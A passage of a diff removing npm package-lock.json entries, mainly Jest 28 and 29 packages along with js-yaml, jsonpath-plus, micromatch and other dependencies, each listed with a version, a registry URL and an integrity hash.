"sha512-aITqOwnLanpHLNXZJENbOgjUBeHocD+xsSJmNrjovKBW5HbSpW3d1pEls7GFQPUWXiwG9+0P4GtHfEqC/4M0Iw==", - "dev": true, - "optional": true, - "peer": true - }, - "expect": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/expect/-/expect-28.1.3.tgz", - "integrity": "sha512-eEh0xn8HlsuOBxFgIss+2mX85VAS4Qy3OSkjV7rlBWljtA4oWH37glVGyOZSZvErDT/yBywZdPGwCXuTvSG85g==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/expect-utils": "^28.1.3", - "jest-get-type": "^28.0.2", - "jest-matcher-utils": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-util": "^28.1.3" - } - }, - "jest-diff": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-28.1.3.tgz", - "integrity": "sha512-8RqP1B/OXzjjTWkqMX67iqgwBVJRgCyKD3L9nq+6ZqJMdvjE8RgHktqZ6jNrkdMT+dJuYNI3rhQpxaz7drJHfw==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "chalk": "^4.0.0", - "diff-sequences": "^28.1.1", - "jest-get-type": "^28.0.2", - "pretty-format": "^28.1.3" - } - }, - "jest-docblock": { - "version": "28.1.1", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-28.1.1.tgz", - "integrity": "sha512-3wayBVNiOYx0cwAbl9rwm5kKFP8yHH3d/fkEaL02NPTkDojPtheGB7HZSFY4wzX+DxyrvhXz0KSCVksmCknCuA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "detect-newline": "^3.0.0" - } - }, - "jest-environment-node": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-28.1.3.tgz", - "integrity": "sha512-ugP6XOhEpjAEhGYvp5Xj989ns5cB1K6ZdjBYuS30umT4CQEETaxSiPcZ/E1kFktX4GkrcM4qu07IIlDYX1gp+A==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/environment": "^28.1.3", - "@jest/fake-timers": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "jest-mock": "^28.1.3", - "jest-util": "^28.1.3" - } - }, - "jest-get-type": { - "version": "28.0.2", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-28.0.2.tgz", - "integrity": "sha512-ioj2w9/DxSYHfOm5lJKCdcAmPJzQXmbM/Url3rhlghrPvT3tt+7a/+oXc9azkKmLvoiXjtV83bEWqi+vs5nlPA==", - "dev": true, - "optional": true, - "peer": true - }, - "jest-haste-map": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-28.1.3.tgz", - "integrity": "sha512-3S+RQWDXccXDKSWnkHa/dPwt+2qwA8CJzR61w3FoYCvoo3Pn8tvGcysmMF0Bj0EX5RYvAI2EIvC57OmotfdtKA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/types": "^28.1.3", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^28.0.2", - "jest-util": "^28.1.3", - "jest-worker": "^28.1.3", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-leak-detector": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-28.1.3.tgz", - "integrity": "sha512-WFVJhnQsiKtDEo5lG2mM0v40QWnBM+zMdHHyJs8AWZ7J0QZJS59MsyKeJHWhpBZBH32S48FOVvGyOFT1h0DlqA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "jest-get-type": "^28.0.2", - "pretty-format": "^28.1.3" - } - }, - "jest-matcher-utils": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-28.1.3.tgz", - "integrity": "sha512-kQeJ7qHemKfbzKoGjHHrRKH6atgxMk8Enkk2iPQ3XwO6oE/KYD8lMYOziCkeSB9G4adPM4nR1DE8Tf5JeWH6Bw==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "chalk": "^4.0.0", - "jest-diff": "^28.1.3", - "jest-get-type": "^28.0.2", - "pretty-format": "^28.1.3" - } - }, - "jest-message-util": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-28.1.3.tgz", - "integrity": "sha512-PFdn9Iewbt575zKPf1286Ht9EPoJmYT7P0kY+RibeYZ2XtOr53pDLEFoTWXbd1h4JiGiWpTBC84fc8xMXQMb7g==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^28.1.3", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^28.1.3", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-mock": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-28.1.3.tgz", - "integrity": "sha512-o3J2jr6dMMWYVH4Lh/NKmDXdosrsJgi4AviS8oXLujcjpCMBb1FMsblDnOXKZKfSiHLxYub1eS0IHuRXsio9eA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/types": "^28.1.3", - "@types/node": "*" - } - }, - "jest-regex-util": { - "version": "28.0.2", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-28.0.2.tgz", - "integrity": "sha512-4s0IgyNIy0y9FK+cjoVYoxamT7Zeo7MhzqRGx7YDYmaQn1wucY9rotiGkBzzcMXTtjrCAP/f7f+E0F7+fxPNdw==", - "dev": true, - "optional": true, - "peer": true - }, - "jest-resolve": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-28.1.3.tgz", - "integrity": "sha512-Z1W3tTjE6QaNI90qo/BJpfnvpxtaFTFw5CDgwpyE/Kz8U/06N1Hjf4ia9quUhCh39qIGWF1ZuxFiBiJQwSEYKQ==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^28.1.3", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^28.1.3", - "jest-validate": "^28.1.3", - "resolve": "^1.20.0", - "resolve.exports": "^1.1.0", - "slash": "^3.0.0" - } - }, - "jest-runner": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-28.1.3.tgz", - "integrity": "sha512-GkMw4D/0USd62OVO0oEgjn23TM+YJa2U2Wu5zz9xsQB1MxWKDOlrnykPxnMsN0tnJllfLPinHTka61u0QhaxBA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/console": "^28.1.3", - "@jest/environment": "^28.1.3", - "@jest/test-result": "^28.1.3", - "@jest/transform": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.10.2", - "graceful-fs": "^4.2.9", - "jest-docblock": "^28.1.1", - "jest-environment-node": "^28.1.3", - "jest-haste-map": "^28.1.3", - "jest-leak-detector": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-resolve": "^28.1.3", - "jest-runtime": "^28.1.3", - "jest-util": "^28.1.3", - "jest-watcher": "^28.1.3", - "jest-worker": "^28.1.3", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - } - }, - "jest-runtime": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-28.1.3.tgz", - "integrity": "sha512-NU+881ScBQQLc1JHG5eJGU7Ui3kLKrmwCPPtYsJtBykixrM2OhVQlpMmFWJjMyDfdkGgBMNjXCGB/ebzsgNGQw==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/environment": "^28.1.3", - "@jest/fake-timers": "^28.1.3", - "@jest/globals": "^28.1.3", - "@jest/source-map": "^28.1.2", - "@jest/test-result": "^28.1.3", - "@jest/transform": "^28.1.3", - "@jest/types": "^28.1.3", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "execa": "^5.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-mock": "^28.1.3", - "jest-regex-util": "^28.0.2", - "jest-resolve": "^28.1.3", - "jest-snapshot": "^28.1.3", - "jest-util": "^28.1.3", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - } - }, - "jest-snapshot": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-28.1.3.tgz", - "integrity": "sha512-4lzMgtiNlc3DU/8lZfmqxN3AYD6GGLbl+72rdBpXvcV+whX7mDrREzkPdp2RnmfIiWBg1YbuFSkXduF2JcafJg==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/traverse": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^28.1.3", - "@jest/transform": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/babel__traverse": "^7.0.6", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^28.1.3", - "graceful-fs": "^4.2.9", - "jest-diff": "^28.1.3", - "jest-get-type": "^28.0.2", - "jest-haste-map": "^28.1.3", - "jest-matcher-utils": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-util": "^28.1.3", - "natural-compare": "^1.4.0", - "pretty-format": "^28.1.3", - "semver": "^7.3.5" - } - }, - "jest-util": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-28.1.3.tgz", - "integrity": "sha512-XdqfpHwpcSRko/C35uLYFM2emRAltIIKZiJ9eAmhjsj0CqZMa0p1ib0R5fWIqGhn1a103DebTbpqIaP1qCQ6tQ==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/types": "^28.1.3", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - } - }, - "jest-validate": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-28.1.3.tgz", - "integrity": "sha512-SZbOGBWEsaTxBGCOpsRWlXlvNkvTkY0XxRfh7zYmvd8uL5Qzyg0CHAXiXKROflh801quA6+/DsT4ODDthOC/OA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/types": "^28.1.3", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^28.0.2", - "leven": "^3.1.0", - "pretty-format": "^28.1.3" - } - }, - "jest-watcher": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-28.1.3.tgz", - "integrity": "sha512-t4qcqj9hze+jviFPUN3YAtAEeFnr/azITXQEMARf5cMwKY2SMBRnCQTXLixTl20OR6mLh9KLMrgVJgJISym+1g==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/test-result": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.10.2", - "jest-util": "^28.1.3", - "string-length": "^4.0.1" - } - }, - "jest-worker": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-28.1.3.tgz", - "integrity": "sha512-CqRA220YV/6jCo8VWvAt1KKx6eek1VIHMPeLEbpcfSfkEeWyBNppynM/o6q+Wmw+sOhos2ml34wZbSX3G13//g==", - "dev": true, - "requires": { - "@types/node": "*", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - } - }, - "pretty-format": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-28.1.3.tgz", - "integrity": "sha512-8gFb/To0OmxHR9+ZTb14Df2vNxdGCX8g1xWGUTqUw5TiZvcQf5sHKObd5UcPyLLyowNwDAMTF3XWOG1B6mxl1Q==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/schemas": "^28.1.3", - "ansi-regex": "^5.0.1", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - } - }, - "resolve.exports": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-1.1.1.tgz", - "integrity": "sha512-/NtpHNDN7jWhAaQ9BvBUYZ6YTXsRBgfqWFWP7BZBaoMJO/I3G5OFzvTuWNlZC3aPjins1F+TNrLKsGbH4rfsRQ==", - "dev": true, - "optional": true, - "peer": true - }, - "semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true, - "optional": true, - "peer": true - }, - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - } - } - }, - "jest-runtime": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.7.0.tgz", - "integrity": "sha512-gUnLjgwdGqW7B4LvOIkbKs9WGbn+QLqRQQ9juC6HndeDiezIwhDP+mhMwHWCEcfQ5RUXa6OPnFF8BJh5xegwwQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/globals": "^29.7.0", - "@jest/source-map": "^29.6.3", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - } - }, - "jest-snapshot": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.7.0.tgz", - "integrity": "sha512-Rm0BMWtxBcioHr1/OX5YCP8Uov4riHvKPknOGs804Zg9JGZgmIBkbtlxJC/7Z4msKYVbIJtfU+tKb8xlYNfdkw==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "natural-compare": "^1.4.0", - "pretty-format": "^29.7.0", - "semver": "^7.5.3" - }, - "dependencies": { - "semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true - } - } - }, - "jest-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.7.0.tgz", - "integrity": "sha512-z6EbKajIpqGKU56y5KBUgy1dt1ihhQJgWzUlZHArA/+X2ad7Cb5iF+AK1EWVL/Bo7Rz9uurpqw6SiBCefUbCGA==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - } - }, - "jest-validate": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.7.0.tgz", - "integrity": "sha512-ZB7wHqaRGVw/9hST/OuFUReG7M8vKeq0/J2egIGLdvjHCmYqGARhzXmtgi+gVeZ5uXFF219aOc3Ls2yLg27tkw==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "leven": "^3.1.0", - "pretty-format": "^29.7.0" - }, - "dependencies": { - "camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true - } - } - }, - "jest-watcher": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.7.0.tgz", - "integrity": "sha512-49Fg7WXkU3Vl2h6LbLtMQ/HyB6rXSIX7SqvBLQmssRBGN9I0PNvPmAmCWSOY6SOvrjhI/F7/bGAv9RtnsPA03g==", - "dev": true, - "requires": { - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.7.0", - "string-length": "^4.0.1" - } - }, - "jest-worker": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.7.0.tgz", - "integrity": "sha512-eIz2msL/EzL9UFTFFx7jBTkeZfku0yUAyZZZmJ93H2TYEiroIx2PQjEXcwYtYl8zXCxb+PAmA2hLIt/6ZEkPHw==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.7.0", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "dependencies": { - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - } - } - }, - "jose": { - "version": "5.9.6", - "resolved": "https://registry.npmjs.org/jose/-/jose-5.9.6.tgz", - "integrity": "sha512-AMlnetc9+CV9asI19zHmrgS/WYsWUwCn2R7RzlbJWD7F9eWYUTGyBmU9o6PxngtLGOiDGPRu+Uc4fhKzbpteZQ==", - "optional": true - }, - "js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "js-yaml": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", - "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", - "requires": { - "argparse": "^2.0.1" - } - }, - "jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" - }, - "jsep": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", - "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==" - }, - "jsesc": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-3.0.2.tgz", - "integrity": "sha512-xKqzzWXDttJuOcawBt4KnKHHIf5oQ/Cxax+0PWFG+DFDgHNAdi+TXECADI+RYiFUMmx8792xsMbbgXj4CwnP4g==", - "dev": true - }, - "json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" - }, - "json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" - }, - "json-stable-stringify-without-jsonify": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/json-stable-stringify-without-jsonify/-/json-stable-stringify-without-jsonify-1.0.1.tgz", - "integrity": "sha512-Bdboy+l7tA3OGW6FjyFHWkP5LuByj1Tk33Ljyq0axyzdk9//JSi2u3fP1QSmd1KNwq6VOKYGlAu87CisVir6Pw==", - "dev": true, - "peer": true - }, - "json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" - }, - "json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true - }, - "jsonpath-plus": { - "version": "10.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.2.0.tgz", - "integrity": "sha512-T9V+8iNYKFL2n2rF+w02LBOT2JjDnTjioaNFrxRy0Bv1y/hNsqR/EBK7Ojy2ythRHwmz2cRIls+9JitQGZC/sw==", - "requires": { - "@jsep-plugin/assignment": "^1.3.0", - "@jsep-plugin/regex": "^1.0.4", - "jsep": "^1.4.0" - } - }, - "jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "requires": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - } - }, - "kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true - }, - "leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true - }, - "levn": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/levn/-/levn-0.4.1.tgz", - "integrity": "sha512-+bT2uH4E5LGE7h/n3evcS/sQlJXCpIp6ym8OWJ5eV6+67Dsql/LaaT7qJBAt2rzfoa/5QBGBhxDix1dMt2kQKQ==", - "dev": true, - "peer": true, - "requires": { - "prelude-ls": "^1.2.1", - "type-check": "~0.4.0" - } - }, - "lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "locate-path": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-6.0.0.tgz", - "integrity": "sha512-iPZK6eYjbxRu3uB4/WZ3EsEIMJFMqAoopl3R+zuq0UjcAm/MO6KCweDgPfP3elTztoKP3KtnVHxTn2NHBSDVUw==", - "dev": true, - "peer": true, - "requires": { - "p-locate": "^5.0.0" - } - }, - "lodash.merge": { - "version": "4.6.2", - "resolved": "https://registry.npmjs.org/lodash.merge/-/lodash.merge-4.6.2.tgz", - "integrity": "sha512-0KpjqXRVvrYyCsX1swR/XTK0va6VQkQM6MNo7PqW77ByjAhoARA8EfrP1N4+KlKj8YS0ZUCtRT/YUuhyYDujIQ==", - "dev": true, - "peer": true - }, - "lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "requires": { - "yallist": "^3.0.2" - } - }, - "make-dir": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-4.0.0.tgz", - "integrity": "sha512-hXdUTZYIVOt1Ex//jAQi+wTZZpUpwBj/0QsOzqegb3rGMMeJiSEu5xLHnYfBrRV4RH2+OCSOO95Is/7x1WJ4bw==", - "dev": true, - "requires": { - "semver": "^7.5.3" - }, - "dependencies": { - "semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true - } - } - }, - "makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "requires": { - "tmpl": "1.0.5" - } - }, - "merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "micromatch": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", - "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", - "dev": true, - "requires": { - "braces": "^3.0.3", - "picomatch": "^2.3.1" - } - }, - "mime-db": { - "version": "1.52.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", - "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==" - }, - "mime-types": { - "version": "2.1.35", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", - "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", - "requires": { - "mime-db": "1.52.0" - } - }, - "mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true - }, - "minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "requires": { - "brace-expansion": "^1.1.7" - } - }, - "minipass": { - "version": "7.1.2", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.2.tgz", - "integrity": 